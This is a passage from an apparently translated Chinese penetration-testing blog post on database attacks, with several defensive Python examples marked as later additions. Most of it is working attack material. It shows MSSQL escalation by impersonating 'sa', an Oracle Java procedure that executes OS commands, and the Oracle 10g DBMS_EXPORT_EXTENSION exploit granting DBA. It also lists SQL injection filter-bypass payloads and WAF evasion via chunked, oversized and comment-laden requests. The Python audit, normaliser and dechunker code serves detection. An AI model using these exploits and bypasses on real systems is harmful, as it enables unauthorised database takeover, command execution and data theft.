    ALTER DATABASE TestDb SET TRUSTWORTHY ON;

User-impersonation privilege escalation (from dbo to sysadmin)

Prerequisites:

  1. A SQL Server shell
  2. The current user has impersonation rights (to impersonate sa or another login with sysadmin)

Details:

  1. List the logins the current user may impersonate

    SELECT distinct b.name FROM sys.server_permissions a INNER JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id WHERE a.permission_name = 'IMPERSONATE';

  2. Impersonate the login to escalate

    -- impersonate sa
    EXECUTE AS LOGIN = 'sa';

  3. Verify

    -- the current user is now the impersonated login, sa here
    SELECT SYSTEM_USER;

    -- check for sysadmin
    SELECT IS_SRVROLEMEMBER('sysadmin');

  4. How to set up impersonation (to reproduce)

    -- create the impersonation environment
    CREATE LOGIN singll001 WITH PASSWORD = 'Singll001.';

    -- grant the login the right to impersonate sa
    USE master;
    GRANT IMPERSONATE ON LOGIN::sa to [singll001];
    GO

On dbo to sysadmin, see [^30].
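An added example, not from the original post, covering the xp_cmdshell, sp_OACreate, TRUSTWORTHY and IMPERSONATE sections above: a Python audit over constructed result sets of the queries quoted there, reporting the configuration each escalation path requires. The function names and severities are my own.

```python
# Constructed result sets, shaped as the queries quoted in the sections above
# would return them through a driver; the values are invented.
SAMPLE_CONFIGURATIONS = {        # sys.configurations: name -> value_in_use
    "show advanced options": 1,
    "xp_cmdshell": 1,
    "Ole Automation Procedures": 0,
}
SAMPLE_DATABASES = [             # (name, is_trustworthy_on, owner_is_sysadmin)
    ("master", 1, True),
    ("msdb", 1, True),
    ("TestDb", 1, True),
    ("Shop", 0, False),
]
SAMPLE_DB_OWNERS = {             # (database, user) pairs holding db_owner
    ("TestDb", "singll"),
}
SAMPLE_IMPERSONATE = [           # (grantee, login that may be impersonated)
    ("singll001", "sa"),
]
SAMPLE_ROLE_MEMBERS = {          # login -> server roles
    "singll001": {"public"},
    "sa": {"sysadmin"},
}
SYSTEM_DBS = {"master", "msdb", "tempdb", "model"}


def audit_mssql(configurations, databases, db_owners, impersonate, role_members):
    """Return (severity, finding) pairs for each escalation path above whose
    preconditions are present. Remediation is the reverse of each enable step:
    sp_configure '<option>', 0 and ALTER DATABASE <db> SET TRUSTWORTHY OFF."""
    findings = []

    if configurations.get("xp_cmdshell"):
        findings.append(("HIGH", "xp_cmdshell is enabled: T-SQL can run OS commands"))
    if configurations.get("Ole Automation Procedures"):
        findings.append(("HIGH", "Ole Automation Procedures is enabled: "
                                 "sp_OACreate can run wscript.shell"))

    for name, trustworthy, owner_sysadmin in databases:
        if not trustworthy or name in SYSTEM_DBS:
            continue
        # TRUSTWORTHY ON plus a sysadmin owner plus a db_owner user is exactly
        # what the EXECUTE AS OWNER procedure in the trusted-database section needs.
        has_dbo = any(db == name for db, _ in db_owners)
        severity = "HIGH" if owner_sysadmin and has_dbo else "MEDIUM"
        findings.append((severity, f"database {name} has TRUSTWORTHY ON"))

    for grantee, target in impersonate:
        target_is_admin = "sysadmin" in role_members.get(target, set())
        grantee_is_admin = "sysadmin" in role_members.get(grantee, set())
        if target_is_admin and not grantee_is_admin:
            findings.append(("HIGH", f"{grantee} holds IMPERSONATE on sysadmin login {target}"))

    return findings


if __name__ == "__main__":
    for severity, text in audit_mssql(SAMPLE_CONFIGURATIONS, SAMPLE_DATABASES,
                                      SAMPLE_DB_OWNERS, SAMPLE_IMPERSONATE,
                                      SAMPLE_ROLE_MEMBERS):
        print(severity, text)
```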

Oracle

Java command-execution privilege escalation

Prerequisites:

  1. The account has the Java command-execution privilege (JAVASYSPRIV)
  2. The database runs as system/root; otherwise system commands run only as the low-privileged account

Details:

-- create the Java package
select dbms_xmlquery.newcontext('declare PRAGMA AUTONOMOUS_TRANSACTION;begin execute immediate ''create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}}'';commit;end;') from dual;

-- grant the Java permission
select dbms_xmlquery.newcontext('declare PRAGMA AUTONOMOUS_TRANSACTION;begin execute immediate ''begin dbms_java.grant_permission( ''''SYSTEM'''', ''''SYS:java.io.FilePermission'''', ''''<<ALL FILES>>'''',''''EXECUTE'''');end;'';commit;end;') from dual;

-- create the function that executes commands
select dbms_xmlquery.newcontext('declare PRAGMA AUTONOMOUS_TRANSACTION;begin execute immediate ''create or replace function shell(p_cmd in varchar2) return varchar2 as language java name ''''LinxUtil.runCMD(java.lang.String) return String''''; '';commit;end;') from dual;

-- execute a command
select shell('whoami') from dual;

SQL statement granting the account the Java command-execution privilege:

GRANT JAVASYSPRIV TO singll;

Details: [^17]

DBMS_EXPORT_EXTENSION privilege escalation (the classic Oracle 10g privilege escalation vulnerability)

Prerequisites:

  1. Version < 10.2.0.4

Details:

-- check privileges
select * from user_role_privs;

-- create the package specification
Create or REPLACE
PACKAGE HACKERPACKAGE AUTHID CURRENT_USER
IS
FUNCTION ODCIIndexGetMetadata (oindexinfo SYS.odciindexinfo,P3 VARCHAR2,p4 VARCHAR2,env SYS.odcienv)
RETURN NUMBER;
END;
/

-- create the package body
Create or REPLACE PACKAGE BODY HACKERPACKAGE
IS
FUNCTION ODCIIndexGetMetadata (oindexinfo SYS.odciindexinfo,P3 VARCHAR2,p4 VARCHAR2,env SYS.odcienv)
RETURN NUMBER
IS
pragma autonomous_transaction;
BEGIN
EXECUTE IMMEDIATE 'GRANT DBA TO singll';
COMMIT;
RETURN(1);
END;
END;
/

-- anonymous block that calls the vulnerable procedure
DECLARE
INDEX_NAME VARCHAR2(200);
INDEX_SCHEMA VARCHAR2(200);
TYPE_NAME VARCHAR2(200);
TYPE_SCHEMA VARCHAR2(200);
VERSION VARCHAR2(200);
NEWBLOCK PLS_INTEGER;
GMFLAGS NUMBER;
v_Return VARCHAR2(200);
BEGIN
INDEX_NAME := 'A1';
INDEX_SCHEMA := 'SINGLL';
TYPE_NAME := 'HACKERPACKAGE';
TYPE_SCHEMA := 'SINGLL';
VERSION := '10.2.0.2.0';
GMFLAGS := 1;
v_Return := SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_METADATA(INDEX_NAME => INDEX_NAME,
INDEX_SCHEMA=> INDEX_SCHEMA,
TYPE_NAME => TYPE_NAME,
TYPE_SCHEMA => TYPE_SCHEMA,
VERSION => VERSION,
NEWBLOCK => NEWBLOCK,
GMFLAGS => GMFLAGS);
END;
/

More: [^31]

0x02 Filter bypass

Some general bypass methods

Case

Select, SeLect, UnIOn, etc.

Nested keywords

When the filter deletes the keyword, use selselectect, uniunionon, etc.

Encoding

Encode, or double-encode, symbols to get past filters on those symbols, for example with Unicode:

Single quote: %u0027 %u02b9 %u02bc %u02c8 %u2032 %uff07 %c0%27 %c0%a7 %e0%80%a7
Space: %u0020 %uff00 %c0%20 %c0%a0 %e0%80%a0
Left parenthesis: %u0028 %uff08 %c0%28 %c0%a8 %e0%80%a8
Right parenthesis: %u0029 %uff09 %c0%29 %c0%a9 %e0%80%a9

Application-specific filter bypass

SELECT

No good bypass found; combine with other approaches, for example injection without select in stacked injection, or using prepared statements to build the string by concatenation.

UNION

No good bypass found; switch to boolean-based injection to retrieve the data.

AND OR XOR NOT

and => &&

or => ||

xor => |

not => !

Note: MySQL only

Whitespace

  1. /**/

    SELECT/**/*/**/FROM/**/users;

  2. ()

    SELECT(id)FROM(users);

    Note: * cannot be used inside the parentheses

  3. ``

    SELECT`id`FROM`users`;

    Note: * cannot be used between the backticks; MySQL only

  4. %0d %0a %0c %0b

    -1'%0Aunion%0Aselect%0A1,2,3%0A'
    -1'union%0Dselect%0D1,2,3%0D'asd
    -1'union%0Dselect%0D1,'2',3%0Dfrom%0Ddual--

    Note: only when the regex filters the space character \x20. Whitespace is often filtered with \s, and then %0a does not get past it.

Methods that replace whitespace only in certain positions

  1. + - @ !

    SELECT+name FROM users;

    Note: only replaces the space after select, and some of these symbols work only in MySQL

Equals sign (=)

  1. Fuzzy matching

    SELECT * FROM users WHERE id LIKE 1;

    Note: in MySQL, RLIKE can replace LIKE

  2. <>

    SELECT * FROM users WHERE not (name <> 'xxx')

    Note: in MySQL, ! can replace not

  3. Regex matching

    -- MySQL
    SELECT * FROM users WHERE name regexp 'xxxx';

    -- Oracle
    SELECT * FROM users WHERE regexp_like(name,'xxx');

    Note: SQL Server has no regex function; one has to be user-defined

Single and double quotes ' "

No general direct bypass; there are some bypasses for particular scenarios.

  1. When no quote needs closing: use hexadecimal in place of anything that would need quotes

    UNION SELECT 1,group_concat(column_name) from information_schema.columns where table_name=0x61645F6C696E6B

  2. When the same SQL statement has two or more injection points: at the first one use \ to escape the quote, then inject at the second

    SELECT * FROM users WHERE id='1\' and name='union select 1,2,3 -- ';

    Note: only MySQL supports \ escaping; it does not work in SQL Server or Oracle

Greater-than and less-than signs ><

  1. between a and b

    SELECT * FROM dbo.users WHERE age BETWEEN 20 AND 24;

  2. Or enumerate using the equals sign =

Comma ,

Can be bypassed in some scenarios.

  1. substr(), mid() -> from ... for (MySQL)

    SELECT substr(database() from 1 for 1)
    SELECT mid(database() from 1 for 1)

  2. Commas in select -> join (MySQL)

    SELECT * from (SELECT 1)a join (SELECT 2)b

    -- equivalent to

    SELECT 1,2

  3. limit -> offset (MySQL)

    SELECT * FROM users LIMIT 0,1;

    -- equivalent to

    SELECT * FROM users LIMIT 1 OFFSET 0

Functions

  • sleep() -> benchmark() (MySQL)
  • group_concat() -> concat_ws() (Oracle)
  • hex(), bin() -> ascii()

For more cases, see [^32][^33][^34][^35].
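An added example, not from the original post, of the normalisation a filter has to perform before keyword matching. It covers the tricks listed in this section (case, the encoded quotes and spaces, comment and control-character whitespace, backticks, parentheses, && and ||) and shows why a delete-once filter fails on nested keywords such as selselectect. The payload strings in the test are constructed, and the keyword list is my own.

```python
import re
from urllib.parse import unquote

KEYWORDS = ("select", "union", "from", "where", "sleep", "benchmark")

# Alternate encodings listed above that some server stacks fold to ASCII. The
# mapping is explicit so the normaliser rewrites only what it understands.
ENCODED_EQUIVALENTS = {
    "'": ["%u0027", "%u02b9", "%u02bc", "%u02c8", "%u2032", "%uff07",
          "%c0%27", "%c0%a7", "%e0%80%a7"],
    " ": ["%u0020", "%uff00", "%c0%20", "%c0%a0", "%e0%80%a0"],
    "(": ["%u0028", "%uff08", "%c0%28", "%c0%a8", "%e0%80%a8"],
    ")": ["%u0029", "%uff09", "%c0%29", "%c0%a9", "%e0%80%a9"],
}


def collapse_nested(s):
    """Rewrite keyword-in-keyword forms (selselectect, uniunionon) to the plain
    keyword, repeating until stable, so the boundary match below sees them."""
    changed = True
    while changed:
        changed = False
        for kw in KEYWORDS:
            pat = "|".join(re.escape(kw[:i] + kw + kw[i:]) for i in range(1, len(kw)))
            s, n = re.subn(pat, kw, s)
            changed = changed or n > 0
    return s


def normalise(payload):
    """Canonicalise a parameter the way a filter must before matching."""
    s = payload
    for plain, variants in ENCODED_EQUIVALENTS.items():
        for v in variants:
            s = re.sub(re.escape(v), plain, s, flags=re.IGNORECASE)
    s = unquote(unquote(s))                      # plain and double URL-encoding
    s = re.sub(r"/\*.*?\*/", " ", s)              # /**/ used as whitespace
    s = re.sub(r"[\t\n\x0b\x0c\r]", " ", s)       # %09 %0a %0b %0c %0d
    s = s.replace("`", " ")                       # SELECT`id`FROM`users`
    s = re.sub(r"(?<=\w)\(|\)(?=\w)", " ", s)     # SELECT(id)FROM(users)
    s = s.lower().replace("&&", " and ").replace("||", " or ")
    s = collapse_nested(s)
    return re.sub(r"\s+", " ", s).strip()


def naive_strip_filter(payload):
    """The weak filter the 'nested keywords' entry targets: delete each keyword
    once, case-sensitively, and pass on whatever remains."""
    for kw in KEYWORDS:
        payload = payload.replace(kw, "")
    return payload


def find_keywords(payload):
    """Keywords present after normalisation: what a filter should match on and
    reject, instead of deleting text and forwarding the remainder."""
    s = normalise(payload)
    return sorted(kw for kw in KEYWORDS if re.search(rf"\b{kw}\b", s))
```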

WAF bypass

Chunked transfer

Chunked transfer is an HTTP data-transfer mechanism. Some WAFs do not reassemble chunked bodies before inspecting them, which allows a bypass.

Transfer-Encoding: chunked

Normal request:

POST /sqli-labs/Less-13/ HTTP/1.1
Host: 192.168.157.128
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0 Waterfox/56.3
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.157.128/sqli-labs/Less-13/
Content-Type: application/x-www-form-urlencoded
Content-Length: 50
Connection: close
Upgrade-Insecure-Requests: 1

uname=admin' and '1'='1&passwd=admin&submit=Submit

Chunked request:

POST /sqli-labs/Less-13/ HTTP/1.1
Host: 192.168.157.128
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0 Waterfox/56.3
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.157.128/sqli-labs/Less-13/
Content-Type: application/x-www-form-urlencoded
Content-Length: 549
Connection: close
Upgrade-Insecure-Requests: 1
Transfer-Encoding: chunked

3;A9tJGnncl
una
2;IZCb6hT1eJ8qD
me
1;XBVvEZRt
=
2;1JP2AENFXfVXScW
ad
2;SPCsugLe
mi
1;zNImE4Q0C
n
1;yyu6Cy7w
'
2;U12gTQPADIkANVRtyaKKPpdbK
 a
1;cBj2s6Mi0IW29j0Ha
n
3;Lt1eA6N8EDeIh6Z1PlJd
d '
3;ozUW1SOXEMe1CPPprlx9a
1'=
2;lNtSRS
'1
1;4OxDMPbIamzEtV3Bf
&
3;vcN7Eym
pas
2;HkiuPiR3
sw
3;SuHLgqpc2
d=a
1;0scle5WntQz8ekq9jocoEKIm
d
2;RoDyHmSY2R5iN625dbY9or
mi
1;X4IQxqpfUYf6DW
n
3;gz5l6lr5
&su
3;9BtN2uhDTOBPVpd
bmi
2;Gqu9QCnek
t=
1;E1TwH64Iu
S
2;oL9sgon
ub
2;yIc4sjuGyOMIQLZYm8tfzf
mi
1;zBprsBRP
t
0

References: [^36]; plugin: [^37]
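An added example, not from the original post: a decoder that reassembles a chunked body, ignoring the random chunk extensions shown above, before a signature is applied, which is the step a WAF that inspects only raw chunks skips. The chunked body (a shorter re-chunking of the same form data) and the tautology signature are constructed.

```python
import re

# Constructed chunked body in the shape shown above: a hex size, a random
# ";extension" that the sending plugin adds and that a decoder must ignore,
# CRLF, the chunk bytes, CRLF. Sizes are hex: c = 12, e = 14.
CHUNKED_BODY = (
    b"3;A9tJGnncl\r\nuna\r\n"
    b"2;IZCb6hT1eJ8qD\r\nme\r\n"
    b"1;XBVvEZRt\r\n=\r\n"
    b"5;zNImE4Q0C\r\nadmin\r\n"
    b"1;yyu6Cy7w\r\n'\r\n"
    b"5;U12gTQPAD\r\n and \r\n"
    b"7;lNtSRS\r\n'1'='1&\r\n"
    b"c;HkiuPiR3\r\npasswd=admin\r\n"
    b"e;Gqu9QCnek\r\n&submit=Submit\r\n"
    b"0\r\n\r\n"
)

CHUNK_HEADER = re.compile(rb"([0-9A-Fa-f]+)(?:;[^\r\n]*)?\r\n")

# Constructed signature for the "admin' and '1'='1" style tautology above.
SIGNATURE = re.compile(r"'\s*(and|or)\s+'[^']*'\s*=\s*'", re.I)


def dechunk(body):
    """Reassemble a Transfer-Encoding: chunked body, discarding chunk extensions
    and the terminating chunk. Raises ValueError on malformed framing rather
    than guessing at the payload."""
    out = bytearray()
    pos = 0
    while True:
        m = CHUNK_HEADER.match(body, pos)
        if not m:
            raise ValueError(f"bad chunk header at offset {pos}")
        size = int(m.group(1), 16)
        pos = m.end()
        if size == 0:
            return bytes(out)
        chunk = body[pos:pos + size]
        if len(chunk) != size or body[pos + size:pos + size + 2] != b"\r\n":
            raise ValueError(f"chunk at offset {pos} does not match declared size {size}")
        out += chunk
        pos += size + 2


def inspect_form_body(body, headers):
    """Decode the body the way the application will see it: dechunk first when
    the request says so, then split the form fields. Without the first step a
    WAF only ever sees fragments such as 'una' and 'me'."""
    if headers.get("Transfer-Encoding", "").lower() == "chunked":
        body = dechunk(body)
    params = {}
    for pair in body.decode("latin-1").split("&"):
        key, _, value = pair.partition("=")
        params[key] = value
    return params


def flagged_parameters(params):
    """Names of the form fields whose value matches the tautology signature."""
    return sorted(k for k, v in params.items() if SIGNATURE.search(v))


if __name__ == "__main__":
    decoded = inspect_form_body(CHUNKED_BODY, {"Transfer-Encoding": "chunked"})
    print("after reassembly:", flagged_parameters(decoded))
    print("raw chunks only:", flagged_parameters(inspect_form_body(CHUNKED_BODY, {})))
```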

Oversized requests

For performance reasons, some WAFs inspect only smaller requests, or only the content within a certain size limit; anything beyond it is skipped.

Normal payload:

?id=1+and+sleep(3)

Bypass payload:

?id=1+and+sleep(3)+and+111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111=111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111

Comments

Some WAFs match the whole statement with a single regex; inserting comment characters into an otherwise normal SQL statement means the pattern no longer matches, and the filter is bypassed.

Normal payload:

?id=1+and+sleep(3)+and+1=2

Bypass payload:

?id=1+and/**/sleep(3)/**/and/**/1=2

Uncovered scenarios

When both GET and POST are accepted, some WAFs filter only one of them, or filter only the GET and POST methods so that other methods get through. Others filter only GET and POST parameters and not Cookie or other HTTP headers. All of these can be bypassed.

Uncovered content types

Some WAFs filter only particular content-types; try changing the content-type to get past them.

Content-Type: multipart/form-data
Content-Type: application/x-www-form-urlencoded
Content-Type: text/xml
Content-Type: application/json

Reference: [^38]; also a method for fuzzing WAFs: [^39]

0x03 References

[^2]: [Technical share] MySQL injection attack and defence (【技术分享】MySQL 注入攻击与防御)
[^3]: [Technical share] MSSQL injection attack and defence (【技术分享】MSSQL 注入攻击与防御)
[^4]: SQL injection summary (Oracle) (SQL注入小结(Oracle))
[^5]: Ten kinds of MySQL error-based injection (十种MySQL报错注入)
[^6]: Some notes on MySQL error-based injection (MYSQL报错注入的一点总结)
[^7]: SQL injection: SQL Server error-based injection (sql注入之——sqlserver报错注入)
[^8]: Summary of Oracle error-based injection (Oracle报错注入总结)
[^9]: [SQL injection tutorial] Getting a shell directly through MySQL injection (【sql注入教程】mysql注入直接getshell)
[^10]: SQL injection getshell (Sql注入getshell)
[^11]: Summary of exploiting MySQL in penetration testing (渗透利用mysql总结)
[^12]: [Databases] Writing a shell with MySQL (【数据库】MySQL写shell)
[^13]: MSSQL injection: executing system commands despite the no-stacking limitation (MSSQL注入 突破不能堆叠的限制执行系统命令)
[^14]: Web penetration: MSSQL LOG backup getshell (Web渗透之mssql LOG备份getshell)
[^15]: MSSQL injection and getshell (mssql注入和getshell)
[^16]: Multiple ways to get a shell and escalate privileges in MSSQL (MSSQL多种姿势拿shell和提权)
[^17]: Databases: the full package from injection to privilege escalation (数据库—从注入到提权的全家桶套餐)
[^18]: Meichuang Security Lab | Summary of writing WebShells through the three major databases (美创安全实验室 | 三大数据库写入WebShell的姿势总结)

[^25]: MySQL 5.* UDF privilege escalation: creating lib\plugin with ADS (mysql 5.* udf提权之利用ADS创建lib\plugin目录)
[^26]: MySQL UDF privilege escalation (MYSQL UDF提权)
[^27]: Some tricks for MySQL UDF privilege escalation (利用MySQL UDF提权过程中的一些技巧)
[^28]: Complete guide to executing OS commands in MSSQL (MSSQL中执行OS命令大全)
[^29]: Day 5: privilege escalation study, MSSQL database privilege escalation summary (Day5——提权学习之MSSQL数据库提权学习总结)
[^30]: Two approaches to escalating from DBO to DBA in SQL Server (浅谈SQL Server从DBO用户提权到DBA的两种思路)

[^32]: Summary of SQL injection bypass methods (SQL注入绕过 方式总结)
[^33]: SQL injection bypass techniques (SQL注入绕过技巧)
[^34]: SQL injection WAF bypass (SQL注入WAF绕过)
[^35]: Summary of SQL injection filter bypasses (SQL注入绕过过滤总结)
[^36]: Beating every WAF with chunked transfer (利用分块传输吊打所有WAF)
[^37]: Burp plugin (burp插件)
[^38]: WAF mechanisms and bypass methods: injection (WAF机制及绕过方法总结:注入篇)
[^39]: WAF bypass for SQL injection (return) (WAF绕过之SQL注入(归来))


Unless otherwise stated, all articles on this blog are licensed under CC BY-SA 4.0; please credit the source when reposting.